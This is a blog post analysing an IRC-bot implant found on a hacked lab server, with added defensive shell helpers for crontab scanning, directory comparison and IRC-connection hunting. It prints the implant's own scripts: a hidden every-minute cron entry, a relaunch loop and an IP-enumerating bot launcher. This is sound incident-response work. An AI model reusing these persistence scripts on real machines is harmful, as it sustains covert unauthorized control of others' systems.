December 6th, 2010

Notes on the Lab Server Getting Hacked (Part 2)

  This post was nearly finished a while ago, but then I got busy, saved it as a draft and forgot about it until recently. Below is a brief analysis of the implanted scripts; my knowledge is limited, so corrections from fellow students are welcome.

  Let's first look at the file structure of the implanted scripts:

root@delleon:~/tmp# find . -printf '%y %p\n'
d .
d ./conect1
f ./conect1/autorun
f ./conect1/run
f ./conect1/bash
f ./conect1/LinkEvents
f ./conect1/start
f ./conect1/inst
d ./conect1/r
f ./conect1/r/raway.e
f ./conect1/r/rnicks.e
f ./conect1/r/rversions.e
f ./conect1/r/rkicks.e
f ./conect1/r/rsignoff.e
f ./conect1/r/rtsay.e
f ./conect1/r/rpickup.e
f ./conect1/r/rsay.e
f ./conect1/r/rinsult.e
d ./conect2
f ./conect2/m.pid
f ./conect2/autorun
f ./conect2/m.lev
f ./conect2/run
f ./conect2/alongi.seen
f ./conect2/.192.168.1.98.user.swp
f ./conect2/vhosts
f ./conect2/bash
f ./conect2/m.set
f ./conect2/LinkEvents
f ./conect2/xey.seen
f ./conect2/cron.d
f ./conect2/start
f ./conect2/m.ses
f ./conect2/inst
f ./conect2/update
f ./conect2/192.168.1.98.user
f ./conect2/192.168.1.98.user2
f ./conect2/mech.dir
d ./conect2/r
f ./conect2/r/raway.e
f ./conect2/r/rnicks.e
f ./conect2/r/rversions.e
f ./conect2/r/rkicks.e
f ./conect2/r/rsignoff.e
f ./conect2/r/rtsay.e
f ./conect2/r/rpickup.e
f ./conect2/r/rsay.e
f ./conect2/r/rinsult.e
d ./conect3
f ./conect3/autorun
f ./conect3/run
f ./conect3/bash
f ./conect3/LinkEvents
f ./conect3/start
f ./conect3/inst
d ./conect3/r
f ./conect3/r/raway.e
f ./conect3/r/rnicks.e
f ./conect3/r/rversions.e
f ./conect3/r/rkicks.e
f ./conect3/r/rsignoff.e
f ./conect3/r/rtsay.e
f ./conect3/r/rpickup.e
f ./conect3/r/rsay.e
f ./conect3/r/rinsult.e

  Comparing the three, the autorun, bash, run and start files and the r directory are completely identical across conect1, conect2 and conect3, and the inst and LinkEvents files implement almost the same functionality. Many of the scripts in conect2 have the executable (x) bit set and it contains several extra files, so dissecting conect2 alone is enough.
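The comparison described above can be done mechanically, which matters when an intruder leaves more than three copies behind. The following is an added triage helper, my own code rather than anything from the post or the implant: it hashes every file in the sibling directories and reports which relative paths are byte-identical everywhere, which differ in content, which differ only in permission bits (the +x observation above), and which exist in only some of the directories. The sample tree it builds is constructed to mirror the listing (placeholder contents, not the real files); `compare_siblings` and `build_sample_tree` are names I chose.

```shell
#!/bin/sh
# Added triage helper (not part of the post or the implant): compare sibling
# drop directories file by file so only the paths that really differ need a
# close look. Needs GNU find/stat and sha256sum, as on the Linux box above.

# Print one line per relative path seen in any of the given directories:
#   IDENTICAL <path>            same content and mode in every directory
#   MODEDIFF  <path> <modes>    same content, different permission bits (e.g. +x)
#   DIFFERS   <path>            content differs between directories
#   PARTIAL   <path> <k>/<n>    present in only k of the n directories
compare_siblings() {
    n=$#
    for d in "$@"; do
        (cd "$d" && find . -type f -printf '%P\n') | while IFS= read -r rel; do
            printf '%s\t%s\t%s\n' "$rel" \
                "$(sha256sum -- "$d/$rel" | cut -d' ' -f1)" \
                "$(stat -c '%a' -- "$d/$rel")"
        done
    done | awk -F'\t' -v n="$n" '
        {
            cnt[$1]++
            # count distinct hashes and distinct modes per relative path
            if (!(($1 SUBSEP $2) in hseen)) { hseen[$1 SUBSEP $2] = 1; nh[$1]++ }
            if (!(($1 SUBSEP $3) in mseen)) { mseen[$1 SUBSEP $3] = 1; nm[$1]++ }
            modes[$1] = (modes[$1] == "" ? $3 : modes[$1] " " $3)
        }
        END {
            for (p in cnt) {
                if (cnt[p] < n)     printf "PARTIAL   %s %d/%d\n", p, cnt[p], n
                else if (nh[p] > 1) printf "DIFFERS   %s\n", p
                else if (nm[p] > 1) printf "MODEDIFF  %s %s\n", p, modes[p]
                else                printf "IDENTICAL %s\n", p
            }
        }' | sort -k2
}

# Constructed sample tree mirroring the listing in the post (contents are
# placeholders, not the real files): conect2 has an edited inst, an
# executable run, and the extra m.pid / cron.d state files.
build_sample_tree() {
    root=$(mktemp -d)
    for d in conect1 conect2 conect3; do
        mkdir -p "$root/$d/r"
        printf '#!/bin/sh\nexport PATH=.\nbash\n' > "$root/$d/run"
        printf 'placeholder for the bash binary\n' > "$root/$d/bash"
        printf 'common inst body\n' > "$root/$d/inst"
        printf 'raway\n' > "$root/$d/r/raway.e"
    done
    printf 'common inst body\n# edited in conect2\n' > "$root/conect2/inst"
    printf '12345\n' > "$root/conect2/m.pid"
    printf '* * * * * /usr/local/lib/.internet/conect2/update >/dev/null 2>&1\n' > "$root/conect2/cron.d"
    find "$root" -type f -exec chmod 644 {} +
    chmod 755 "$root/conect2/run"
    echo "$root"
}

# Usage on a real copy: compare_siblings ~/tmp/conect1 ~/tmp/conect2 ~/tmp/conect3
if [ "$#" -ge 2 ]; then
    compare_siblings "$@"
fi
```

Running it on the sample tree yields six lines: bash and r/raway.e IDENTICAL, inst DIFFERS, run MODEDIFF (644 755 644), and m.pid and cron.d PARTIAL 1/3, which is exactly the shortlist a responder wants before opening anything in a hex editor.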

  Let's start with cron.d: this is the file that was added to the server's crontab, making the update script run once every minute. The update script first checks whether an m.pid file recording the process ID exists; if so, it kills that process and then runs the run script. The run script executes the bash file in the same directory, and that bash is a binary.

root@delleon:~/tmp/conect2# cat cron.d 
* * * * * /usr/local/lib/.internet/conect2/update >/dev/null 2>&1
root@delleon:~/tmp/conect2# cat update 
#!/bin/sh
if test -r /usr/local/lib/.internet/conect2/m.pid; then
pid=$(cat /usr/local/lib/.internet/conect2/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/local/lib/.internet/conect2
./run &>/dev/null
root@delleon:~/tmp/conect2# cat run 
#!/bin/sh
export PATH=.
bash
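The update script above repays a careful reading. `kill -CHLD $pid` sends SIGCHLD, which a process ignores by default, so the line is a liveness probe rather than a kill: while the recorded PID is still alive the script exits 0, and only when it is gone does it `cd` into the directory and relaunch `run`. The odd `if $(kill …)` form works because a simple command that expands to no command name takes the exit status of its command substitution. Together with the every-minute schedule, the hidden `.internet` directory and the output discarded to /dev/null, this is a persistence pattern worth hunting for in crontabs. The following is an added example, my own code rather than anything from the post: `scan_crontab` flags entries showing those traits over a constructed sample crontab that includes the page's own line, and `probe_pid` performs the same liveness check with signal 0 so nothing is actually delivered. Function names and the sample lines are mine.

```shell
#!/bin/sh
# Added detection example (not part of the post): flag crontab entries that
# share the traits of the implant's cron.d line. Each trait alone is common in
# benign crontabs; the combination is what made this entry stand out.

# Constructed sample crontab: the page's own line plus benign entries.
SAMPLE_CRONTAB=$(cat <<'EOF'
SHELL=/bin/sh
# m h dom mon dow command
17 * * * * cd / && run-parts --report /etc/cron.hourly
0 3 * * * /usr/local/bin/backup.sh >/var/log/backup.log 2>&1
* * * * * /usr/local/lib/.internet/conect2/update >/dev/null 2>&1
*/5 * * * * /home/alice/.local/bin/sync-notes
EOF
)

# has STRING ERE: true when the extended regex matches the string.
has() {
    printf '%s\n' "$1" | grep -Eq -- "$2"
}

# Read crontab lines on stdin; print "reasons<TAB>entry" for each entry that
# matches at least one trait. Assumes the 5-field user-crontab format shown in
# the post (no user column); the entry is re-emitted with normalised spacing.
scan_crontab() {
    while read -r m h dom mon dow cmd; do
        [ -n "$m" ] || continue                 # blank line
        case $m in
            '#'*) continue ;;                   # comment
            *=*)  continue ;;                   # VAR=value assignment
        esac
        reasons=
        [ "$m $h $dom $mon $dow" = "* * * * *" ] && reasons="${reasons}every-minute,"
        # a path component that starts with '.', e.g. /usr/local/lib/.internet
        has "$cmd" '/\.[^./[:space:]]' && reasons="${reasons}hidden-dir,"
        # stdout and stderr both thrown away
        has "$cmd" '/dev/null' && has "$cmd" '2>&1|&>' && reasons="${reasons}silenced,"
        # world-writable scratch locations
        has "$cmd" '(^|[[:space:]])/(tmp|var/tmp|dev/shm)/' && reasons="${reasons}tmp-path,"
        [ -n "$reasons" ] && printf '%s\t%s %s %s %s %s %s\n' \
            "${reasons%,}" "$m" "$h" "$dom" "$mon" "$dow" "$cmd"
    done
    return 0
}

# Liveness probe equivalent to the implant's `kill -CHLD $pid` test, but with
# signal 0 so nothing is delivered. Succeeds only for a numeric PID that exists
# and that we are allowed to signal.
probe_pid() {
    case $1 in
        ''|*[!0-9]*) return 1 ;;
    esac
    kill -0 "$1" 2>/dev/null
}

# Usage on a live host: crontab -l | scan_crontab
if [ "${1-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
fi
```

On the sample input two entries are reported: the implant line with `every-minute,hidden-dir,silenced`, and the benign `~/.local` job with `hidden-dir` alone. That second hit is the point of listing the reasons instead of a yes/no verdict: a dot-directory by itself is normal, and it is the stack of traits on one line that deserves a look.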

  That path seemed to be a dead end. Wait, we skipped a few other scripts: start, autorun and run. Let's look at the contents of start:

root@delleon:~/hack.connect/conect2# cat start
#!/bin/bash
 
if [ $# != 1 ]; then
        echo "=====>Multi mech startup mood by b-u-f-u<====="
        echo "++++++#conf --> *Mereu cu un pas inainte*  ++++++++"
        echo "Exemplu : ./start chann "
        echo "P.S : fara diez!"
        exit;
fi
 
 
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "=====>Multi mech startup mech mood by b-u-f-u<====="
echo "++++++#conf --> *Mereu cu un pas inainte*  ++++++++"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
 
while read line; do
   ./inst $1 $line
 
case "$D" in
"1")
echo -e "\b\.\c"
D=2
;;
"2")
echo -e "\b\..\c"
D=3
;;
"3")
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run

  Alright, so start is actually what runs first: it writes the public IPs into the vhosts file and assigns them to $B and $D. The next step is the install process: a loop that repeatedly runs the inst script with the IP just obtained as an argument. inst then tries to log in to the IRC services at the IPs and ports listed in m.set. Why do I say IRC? Because the port specified in m.set is 6667, the one IRC uses. By this point a picture starts to form: was it quietly logging into IRC to send spam? Reading on, the last things start executes are the autorun and run scripts; autorun generates the cron.d seen earlier and adds it to crontab. Good, the sequence is basically clear now.

  Since I cannot read the binary, in the end I really could not work out exactly what this attacker's program was meant to do. From the traces it looks like it opens TCP port 6667 and an IRC bot, but what happens after that is unclear; my guess is that it spams IRC channels.
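Given that picture, the practical follow-up on a live host is to look for the bot's connections rather than its name, because the dropped binary is literally called bash and would slip past any check that trusts process names. The following is an added example, my own code rather than anything from the post: `find_irc_conns` reads `ss -tnp` output and prints the PID, process name and peer for every established connection to an IRC port. Port 6667 comes from the post's m.set observation; 6697 (IRC over TLS) is my addition, and the `ss` output it parses here is constructed.

```shell
#!/bin/sh
# Added hunting example (not part of the post): pick established TCP
# connections to IRC ports out of `ss -tnp` output. 6667 is the port the
# post saw in m.set; 6697 is the usual IRC-over-TLS port (my addition).

IRC_PORTS="6667 6697"

# Constructed `ss -tnp` output: one sshd session, the implant (named "bash",
# like the real binary in the drop directory), an HTTPS client, a stale
# TIME-WAIT socket to the IRC server, and a local IRC client over TLS.
SAMPLE_SS=$(cat <<'EOF'
State     Recv-Q Send-Q Local Address:Port    Peer Address:Port   Process
ESTAB     0      0      192.168.1.98:22       192.168.1.10:50222  users:(("sshd",pid=1183,fd=4))
ESTAB     0      0      192.168.1.98:53412    203.0.113.5:6667    users:(("bash",pid=4321,fd=3))
ESTAB     0      0      192.168.1.98:40011    198.51.100.7:443    users:(("curl",pid=4400,fd=5))
TIME-WAIT 0      0      192.168.1.98:53400    203.0.113.5:6667
ESTAB     0      0      [::1]:36666           [::1]:6697          users:(("irssi",pid=2222,fd=7))
EOF
)

# Read `ss -tnp`-style lines on stdin; print "pid name peer" for every
# established connection whose peer port is in IRC_PORTS. The header line and
# non-ESTAB states are skipped; a missing process column yields "?".
find_irc_conns() {
    while read -r state rq sq laddr paddr proc; do
        [ "$state" = "ESTAB" ] || continue
        port=${paddr##*:}                  # works for [::1]:6697 as well
        case " $IRC_PORTS " in
            *" $port "*) ;;
            *) continue ;;
        esac
        pid='?'; name='?'
        case $proc in
            *pid=*)
                # proc looks like users:(("bash",pid=4321,fd=3))
                name=${proc#*\"}; name=${name%%\"*}
                pid=${proc#*pid=}; pid=${pid%%,*}
                ;;
        esac
        printf '%s %s %s\n' "$pid" "$name" "$paddr"
    done
}

# Usage on a live host (needs root to see other users' PIDs): ss -tnp | find_irc_conns
if [ "${1-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_SS" | find_irc_conns
fi
```

On the sample it prints `4321 bash 203.0.113.5:6667` and `2222 irssi [::1]:6697`. From there, `readlink /proc/4321/exe` and `readlink /proc/4321/cwd` show whether that "bash" is the system shell or a file living under a hidden directory such as the post's /usr/local/lib/.internet, which is the distinction a process list alone cannot make.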
